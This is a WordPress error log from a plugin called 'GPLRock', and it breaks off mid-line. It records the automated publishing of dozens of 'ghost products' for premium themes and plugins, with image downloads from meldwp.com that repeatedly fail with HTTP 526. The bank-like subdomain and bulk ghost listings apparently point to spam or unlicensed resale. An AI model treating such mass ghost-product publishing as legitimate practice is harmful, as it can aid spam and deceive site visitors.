/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49cbbe0b.webp [06-Apr-2026 11:28:50 UTC] GPLRock: Using pre-downloaded image for product hipsound-music-streaming-podcast-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49cbbe0b.webp [06-Apr-2026 11:28:50 UTC] GPLRock: Ghost product published with image - Product ID: hipsound-music-streaming-podcast-elementor-template-kit [06-Apr-2026 11:28:51 UTC] GPLRock: Image downloaded successfully for product himara-hotel-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1c7dfd8e.webp [06-Apr-2026 11:28:51 UTC] GPLRock: Using pre-downloaded image for product himara-hotel-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1c7dfd8e.webp [06-Apr-2026 11:28:51 UTC] GPLRock: Ghost product published with image - Product ID: himara-hotel-template-kit [06-Apr-2026 11:28:52 UTC] GPLRock: Image downloaded successfully for product himalaya-construction-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb055a4e.webp [06-Apr-2026 11:28:53 UTC] GPLRock: Using pre-downloaded image for product himalaya-construction-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eb055a4e.webp [06-Apr-2026 11:28:53 UTC] GPLRock: Ghost product published with image - Product ID: himalaya-construction-elementor-template-kit [06-Apr-2026 11:28:54 UTC] GPLRock: Image downloaded successfully for product hillary-creative-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e6542171.webp [06-Apr-2026 11:28:54 UTC] GPLRock: Using pre-downloaded image for product hillary-creative-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e6542171.webp [06-Apr-2026 11:28:54 UTC] GPLRock: Ghost product published with image - Product ID: hillary-creative-portfolio-elementor-template-kit [06-Apr-2026 11:28:56 UTC] GPLRock: Image downloaded successfully for product hijabi-muslim-shop-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d8883b0.webp [06-Apr-2026 11:28:56 UTC] GPLRock: Using pre-downloaded image for product hijabi-muslim-shop-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d8883b0.webp [06-Apr-2026 11:28:56 UTC] GPLRock: Ghost product published with image - Product ID: hijabi-muslim-shop-woocommerce-elementor-template-kit [06-Apr-2026 11:44:41 UTC] GPLRock: Image download failed for product golden-forms-responsive-css3-form-framework (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:44:43 UTC] GPLRock: Image download failed for product golden-forms-responsive-css3-form-framework (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:44:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/golden-forms---responsive-css3-form-framework-16614.webp for product golden-forms-responsive-css3-form-framework after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:44:45 UTC] GPLRock: Image download failed for product golden-forms-responsive-css3-form-framework (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:44:47 UTC] GPLRock: Image download failed for product golden-forms-responsive-css3-form-framework (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:44:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/golden-forms---responsive-css3-form-framework-16614.webp for product golden-forms-responsive-css3-form-framework after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:44:49 UTC] GPLRock WARNING: Image download failed for product golden-forms-responsive-css3-form-framework. URL: https://meldwp.com/wp-content/uploads/golden-forms---responsive-css3-form-framework-16614.webp [06-Apr-2026 11:44:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: golden-forms-responsive-css3-form-framework [06-Apr-2026 11:44:49 UTC] GPLRock: Image download failed for product woocommerce-pos-stripe-reader-m2-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:44:51 UTC] GPLRock: Image download failed for product woocommerce-pos-stripe-reader-m2-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:44:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pos-stripe-reader-m2-integration-2918.webp for product woocommerce-pos-stripe-reader-m2-integration after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:44:54 UTC] GPLRock: Image download failed for product woocommerce-pos-stripe-reader-m2-integration (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:44:56 UTC] GPLRock: Image download failed for product woocommerce-pos-stripe-reader-m2-integration (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:44:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pos-stripe-reader-m2-integration-2918.webp for product woocommerce-pos-stripe-reader-m2-integration after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:44:58 UTC] GPLRock WARNING: Image download failed for product woocommerce-pos-stripe-reader-m2-integration. URL: https://meldwp.com/wp-content/uploads/woocommerce-pos-stripe-reader-m2-integration-2918.webp [06-Apr-2026 11:44:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-pos-stripe-reader-m2-integration [06-Apr-2026 11:44:58 UTC] GPLRock: Image download failed for product splayer-sticky-audio-player-with-playlist (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:00 UTC] GPLRock: Image download failed for product splayer-sticky-audio-player-with-playlist (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/splayer---sticky-audio-player-with-playlist-12989.webp for product splayer-sticky-audio-player-with-playlist after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:02 UTC] GPLRock: Image download failed for product splayer-sticky-audio-player-with-playlist (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:04 UTC] GPLRock: Image download failed for product splayer-sticky-audio-player-with-playlist (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/splayer---sticky-audio-player-with-playlist-12989.webp for product splayer-sticky-audio-player-with-playlist after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:06 UTC] GPLRock WARNING: Image download failed for product splayer-sticky-audio-player-with-playlist. URL: https://meldwp.com/wp-content/uploads/splayer---sticky-audio-player-with-playlist-12989.webp [06-Apr-2026 11:45:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: splayer-sticky-audio-player-with-playlist [06-Apr-2026 11:45:06 UTC] GPLRock: Image download failed for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:09 UTC] GPLRock: Image download failed for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-addon-for-idonatepro---blood-donation-request-and-donor-management-7936.webp for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:11 UTC] GPLRock: Image download failed for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:13 UTC] GPLRock: Image download failed for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-addon-for-idonatepro---blood-donation-request-and-donor-management-7936.webp for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:15 UTC] GPLRock WARNING: Image download failed for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management. URL: https://meldwp.com/wp-content/uploads/elementor-addon-for-idonatepro---blood-donation-request-and-donor-management-7936.webp [06-Apr-2026 11:45:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementor-addon-for-idonatepro-blood-donation-request-and-donor-management [06-Apr-2026 11:45:15 UTC] GPLRock: Image download failed for product video-player-with-playlist-cornerstone-wp-addon-w-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:17 UTC] GPLRock: Image download failed for product video-player-with-playlist-cornerstone-wp-addon-w-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-player-with-playlist---cornerstone-wp-addon-w-woocommerce-6570.webp for product video-player-with-playlist-cornerstone-wp-addon-w-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:19 UTC] GPLRock: Image download failed for product video-player-with-playlist-cornerstone-wp-addon-w-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:22 UTC] GPLRock: Image download failed for product video-player-with-playlist-cornerstone-wp-addon-w-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-player-with-playlist---cornerstone-wp-addon-w-woocommerce-6570.webp for product video-player-with-playlist-cornerstone-wp-addon-w-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:24 UTC] GPLRock WARNING: Image download failed for product video-player-with-playlist-cornerstone-wp-addon-w-woocommerce. URL: https://meldwp.com/wp-content/uploads/video-player-with-playlist---cornerstone-wp-addon-w-woocommerce-6570.webp [06-Apr-2026 11:45:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: video-player-with-playlist-cornerstone-wp-addon-w-woocommerce [06-Apr-2026 11:45:24 UTC] GPLRock: Image download failed for product enefti-nft-marketplace-core (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:26 UTC] GPLRock: Image download failed for product enefti-nft-marketplace-core (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enefti---nft-marketplace-core-2388.webp for product enefti-nft-marketplace-core after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:28 UTC] GPLRock: Image download failed for product enefti-nft-marketplace-core (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:30 UTC] GPLRock: Image download failed for product enefti-nft-marketplace-core (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enefti---nft-marketplace-core-2388.webp for product enefti-nft-marketplace-core after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:32 UTC] GPLRock WARNING: Image download failed for product enefti-nft-marketplace-core. URL: https://meldwp.com/wp-content/uploads/enefti---nft-marketplace-core-2388.webp [06-Apr-2026 11:45:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: enefti-nft-marketplace-core [06-Apr-2026 11:45:32 UTC] GPLRock: Image download failed for product woocommerce-smswhatsapp-notifications (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:35 UTC] GPLRock: Image download failed for product woocommerce-smswhatsapp-notifications (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-smswhatsapp-notifications-1930.webp for product woocommerce-smswhatsapp-notifications after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:37 UTC] GPLRock: Image download failed for product woocommerce-smswhatsapp-notifications (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:39 UTC] GPLRock: Image download failed for product woocommerce-smswhatsapp-notifications (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-smswhatsapp-notifications-1930.webp for product woocommerce-smswhatsapp-notifications after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:41 UTC] GPLRock WARNING: Image download failed for product woocommerce-smswhatsapp-notifications. URL: https://meldwp.com/wp-content/uploads/woocommerce-smswhatsapp-notifications-1930.webp [06-Apr-2026 11:45:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-smswhatsapp-notifications [06-Apr-2026 11:45:41 UTC] GPLRock: Image download failed for product woocommerce-courier-center-voucher-label (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:43 UTC] GPLRock: Image download failed for product woocommerce-courier-center-voucher-label (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-courier-center-voucher--label-19271.webp for product woocommerce-courier-center-voucher-label after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:45 UTC] GPLRock: Image download failed for product woocommerce-courier-center-voucher-label (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:47 UTC] GPLRock: Image download failed for product woocommerce-courier-center-voucher-label (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-courier-center-voucher--label-19271.webp for product woocommerce-courier-center-voucher-label after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:50 UTC] GPLRock WARNING: Image download failed for product woocommerce-courier-center-voucher-label. URL: https://meldwp.com/wp-content/uploads/woocommerce-courier-center-voucher--label-19271.webp [06-Apr-2026 11:45:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-courier-center-voucher-label [06-Apr-2026 11:45:50 UTC] GPLRock: Image download failed for product truebooker-appointment-booking-scheduler-plugins-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:52 UTC] GPLRock: Image download failed for product truebooker-appointment-booking-scheduler-plugins-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/truebooker---appointment-booking--scheduler-plugins-for-wordpress-9681.webp for product truebooker-appointment-booking-scheduler-plugins-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:54 UTC] GPLRock: Image download failed for product truebooker-appointment-booking-scheduler-plugins-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:56 UTC] GPLRock: Image download failed for product truebooker-appointment-booking-scheduler-plugins-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:45:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/truebooker---appointment-booking--scheduler-plugins-for-wordpress-9681.webp for product truebooker-appointment-booking-scheduler-plugins-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:45:58 UTC] GPLRock WARNING: Image download failed for product truebooker-appointment-booking-scheduler-plugins-for-wordpress. URL: https://meldwp.com/wp-content/uploads/truebooker---appointment-booking--scheduler-plugins-for-wordpress-9681.webp [06-Apr-2026 11:45:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: truebooker-appointment-booking-scheduler-plugins-for-wordpress [06-Apr-2026 11:45:58 UTC] GPLRock: Image download failed for product show-woocommerce-product-variations-dropdown-on-shop-page-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:46:00 UTC] GPLRock: Image download failed for product show-woocommerce-product-variations-dropdown-on-shop-page-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:46:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/show-woocommerce-product-variations-dropdown-on-shop-page-plugin-18276.webp for product show-woocommerce-product-variations-dropdown-on-shop-page-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:46:03 UTC] GPLRock: Image download failed for product show-woocommerce-product-variations-dropdown-on-shop-page-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:46:05 UTC] GPLRock: Image download failed for product show-woocommerce-product-variations-dropdown-on-shop-page-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:46:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/show-woocommerce-product-variations-dropdown-on-shop-page-plugin-18276.webp for product show-woocommerce-product-variations-dropdown-on-shop-page-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:46:07 UTC] GPLRock WARNING: Image download failed for product show-woocommerce-product-variations-dropdown-on-shop-page-plugin. URL: https://meldwp.com/wp-content/uploads/show-woocommerce-product-variations-dropdown-on-shop-page-plugin-18276.webp [06-Apr-2026 11:46:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: show-woocommerce-product-variations-dropdown-on-shop-page-plugin [06-Apr-2026 11:47:32 UTC] GPLRock: Image downloaded successfully for product give-authorize-net-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5f95060.jpg [06-Apr-2026 11:47:32 UTC] GPLRock: Using pre-downloaded image for product give-authorize-net-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5f95060.jpg [06-Apr-2026 11:47:32 UTC] GPLRock: Ghost product published with image - Product ID: give-authorize-net-gateway [06-Apr-2026 11:47:34 UTC] GPLRock: Image downloaded successfully for product andaman-creative-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca466ca1.jpg [06-Apr-2026 11:47:34 UTC] GPLRock: Using pre-downloaded image for product andaman-creative-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca466ca1.jpg [06-Apr-2026 11:47:34 UTC] GPLRock: Ghost product published with image - Product ID: andaman-creative-business-wordpress-theme [06-Apr-2026 11:47:35 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-coursepress-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a94d3d4e.jpg [06-Apr-2026 11:47:35 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-coursepress-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a94d3d4e.jpg [06-Apr-2026 11:47:35 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-coursepress-pro [06-Apr-2026 11:47:37 UTC] GPLRock: Image downloaded successfully for product erplayer-radio-player-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24c40e02.jpg [06-Apr-2026 11:47:37 UTC] GPLRock: Using pre-downloaded image for product erplayer-radio-player-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24c40e02.jpg [06-Apr-2026 11:47:37 UTC] GPLRock: Ghost product published with image - Product ID: erplayer-radio-player-for-elementor [06-Apr-2026 11:47:39 UTC] GPLRock: Image downloaded successfully for product modal-login-register-forgotten-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-08a76ca4.jpg [06-Apr-2026 11:47:39 UTC] GPLRock: Using pre-downloaded image for product modal-login-register-forgotten-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-08a76ca4.jpg [06-Apr-2026 11:47:39 UTC] GPLRock: Ghost product published with image - Product ID: modal-login-register-forgotten-wordpress-plugin [06-Apr-2026 11:47:40 UTC] GPLRock: Image downloaded successfully for product give-paytm-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fbd57eb6.jpg [06-Apr-2026 11:47:40 UTC] GPLRock: Using pre-downloaded image for product give-paytm-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fbd57eb6.jpg [06-Apr-2026 11:47:40 UTC] GPLRock: Ghost product published with image - Product ID: give-paytm-gateway [06-Apr-2026 11:47:42 UTC] GPLRock: Image downloaded successfully for product mythemeshop-risen-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3131286.jpg [06-Apr-2026 11:47:42 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-risen-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3131286.jpg [06-Apr-2026 11:47:42 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-risen-wordpress-theme [06-Apr-2026 11:47:44 UTC] GPLRock: Image downloaded successfully for product buttons-x-powerful-button-builder-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c145168.jpg [06-Apr-2026 11:47:44 UTC] GPLRock: Using pre-downloaded image for product buttons-x-powerful-button-builder-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c145168.jpg [06-Apr-2026 11:47:44 UTC] GPLRock: Ghost product published with image - Product ID: buttons-x-powerful-button-builder-for-wordpress [06-Apr-2026 11:47:45 UTC] GPLRock: Image downloaded successfully for product envira-gallery-exif-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d58a836c.jpg [06-Apr-2026 11:47:45 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-exif-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d58a836c.jpg [06-Apr-2026 11:47:45 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-exif-addon [06-Apr-2026 11:47:47 UTC] GPLRock: Image downloaded successfully for product memberpress-amazon-web-services-aws (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7107b7e4.jpg [06-Apr-2026 11:47:47 UTC] GPLRock: Using pre-downloaded image for product memberpress-amazon-web-services-aws: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7107b7e4.jpg [06-Apr-2026 11:47:47 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-amazon-web-services-aws [06-Apr-2026 11:48:55 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-events-plus (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9958639a.jpg [06-Apr-2026 11:48:55 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-events-plus: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9958639a.jpg [06-Apr-2026 11:48:55 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-events-plus [06-Apr-2026 11:48:56 UTC] GPLRock: Image downloaded successfully for product arg-multistep-checkout-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98aef62e.jpg [06-Apr-2026 11:48:56 UTC] GPLRock: Using pre-downloaded image for product arg-multistep-checkout-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98aef62e.jpg [06-Apr-2026 11:48:56 UTC] GPLRock: Ghost product published with image - Product ID: arg-multistep-checkout-for-woocommerce [06-Apr-2026 11:48:58 UTC] GPLRock: Image downloaded successfully for product accordion-faq-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16807d57.jpg [06-Apr-2026 11:48:58 UTC] GPLRock: Using pre-downloaded image for product accordion-faq-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16807d57.jpg [06-Apr-2026 11:48:58 UTC] GPLRock: Ghost product published with image - Product ID: accordion-faq-wordpress-plugin [06-Apr-2026 11:49:00 UTC] GPLRock: Image downloaded successfully for product mythemeshop-entrepreneurship-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5e4d11f.jpg [06-Apr-2026 11:49:00 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-entrepreneurship-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5e4d11f.jpg [06-Apr-2026 11:49:00 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-entrepreneurship-wordpress-theme [06-Apr-2026 11:49:01 UTC] GPLRock: Image downloaded successfully for product yith-petshopper-e-commerce-theme-for-pets-products (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c76a6cd7.jpg [06-Apr-2026 11:49:01 UTC] GPLRock: Using pre-downloaded image for product yith-petshopper-e-commerce-theme-for-pets-products: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c76a6cd7.jpg [06-Apr-2026 11:49:01 UTC] GPLRock: Ghost product published with image - Product ID: yith-petshopper-e-commerce-theme-for-pets-products [06-Apr-2026 11:49:03 UTC] GPLRock: Image downloaded successfully for product array-themes-baseline-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab882463.jpg [06-Apr-2026 11:49:03 UTC] GPLRock: Using pre-downloaded image for product array-themes-baseline-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab882463.jpg [06-Apr-2026 11:49:03 UTC] GPLRock: Ghost product published with image - Product ID: array-themes-baseline-wordpress-theme [06-Apr-2026 11:49:05 UTC] GPLRock: Image downloaded successfully for product mythemeshop-simple-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9451538.jpg [06-Apr-2026 11:49:05 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-simple-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9451538.jpg [06-Apr-2026 11:49:05 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-simple-wordpress-theme [06-Apr-2026 11:49:06 UTC] GPLRock: Image downloaded successfully for product woocommerce-quick-view (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b241a92.jpg [06-Apr-2026 11:49:06 UTC] GPLRock: Using pre-downloaded image for product woocommerce-quick-view: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b241a92.jpg [06-Apr-2026 11:49:06 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-quick-view [06-Apr-2026 11:49:08 UTC] GPLRock: Image downloaded successfully for product css-igniter-olympus-inn-hotel-motel-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-71ffd12f.jpg [06-Apr-2026 11:49:08 UTC] GPLRock: Using pre-downloaded image for product css-igniter-olympus-inn-hotel-motel-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-71ffd12f.jpg [06-Apr-2026 11:49:08 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-olympus-inn-hotel-motel-wordpress-theme [06-Apr-2026 11:49:09 UTC] GPLRock: Image downloaded successfully for product mainwp-updraftplus (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6d37feab.jpg [06-Apr-2026 11:49:09 UTC] GPLRock: Using pre-downloaded image for product mainwp-updraftplus: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6d37feab.jpg [06-Apr-2026 11:49:09 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-updraftplus [06-Apr-2026 11:51:53 UTC] GPLRock: Image download failed for product kossy-minimalist-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:51:55 UTC] GPLRock: Image download failed for product kossy-minimalist-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:51:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kossy---minimalist-ecommerce-wordpress-theme-11701.webp for product kossy-minimalist-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:51:57 UTC] GPLRock: Image download failed for product kossy-minimalist-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:00 UTC] GPLRock: Image download failed for product 